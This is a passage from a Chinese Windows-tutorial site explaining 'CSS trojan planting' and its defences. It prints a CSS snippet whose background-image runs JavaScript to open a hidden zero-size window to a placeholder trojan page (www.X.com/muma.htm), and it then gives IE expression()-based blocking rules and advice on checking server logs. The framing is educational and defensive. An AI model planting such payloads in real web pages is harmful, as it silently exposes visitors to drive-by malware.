Windows XP Windows 7 Windows 2003 Windows Vista Windows教程綜合 Linux 系統教程
Windows 10 Windows 8 Windows 2008 Windows NT Windows Server 電腦軟件教程
 Windows教程網 >> Windows XP系統教程 >> 關於XP系統教程 >> 安全教程:了解CSS掛馬及防范方法(2)

安全教程:了解CSS掛馬及防范方法(2)

日期:2017/1/23 17:11:54      編輯:關於XP系統教程

  小百科:使用Body對象元素,主要是為了讓對象不再改變整個網頁文檔的內容,通過Body對象的控制,可以將內容或者效果控制在指定的大小內,如同使用DIV對象那樣精確地設置大小。

  方式2:

  Body{

  background-image: url(javascript:open(' http://www.X.com/muma.htm ','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))

  }

  方式1的CSS掛馬技術,在運行時會出現空白的頁面,影響網頁訪問者正常的訪問,因此比較容易發現。不過在方式2中的這段代碼,使用了JavaScript的Open開窗,通過新開一個隱藏的窗口,在後台悄悄地運行新窗口並激活訪問網頁溢出木馬頁面,不會影響訪問者觀看網頁內容,因此更加隱蔽。

  防網絡服務器被掛馬,通常會出現防病毒軟件告警之類的信息。由於漏洞不斷更新,掛馬種類時刻都在變換,通過客戶端的反映來發現服務器是否被掛馬往往疏漏較大。正確的做法是經常檢查服務器日志,發現異常信息,經常檢查網站代碼,使用網頁木馬檢測系統,進行排查。

  目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外,還可以在網頁中設置CSS過濾,將CSS過濾掉。不過如果你選擇過濾CSS的話,首先需要留意自己的相關網頁是否有CSS的內容,因此我們仍然首推用阻斷方式來防范CSS。阻斷代碼如下所示:

  iframe{miao1:expression(this.src='about:blank',this.outerHTML='');}

  script{miao2:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

  將外域的木馬代碼的src重寫成本地IE404錯誤頁面的地址,這樣,外域的JavaScript代碼不會被下載。不過阻斷方式也有天生致命的弱點,弱點的秘密我們將於下次揭曉。

Copyright © Windows教程網 All Rights Reserved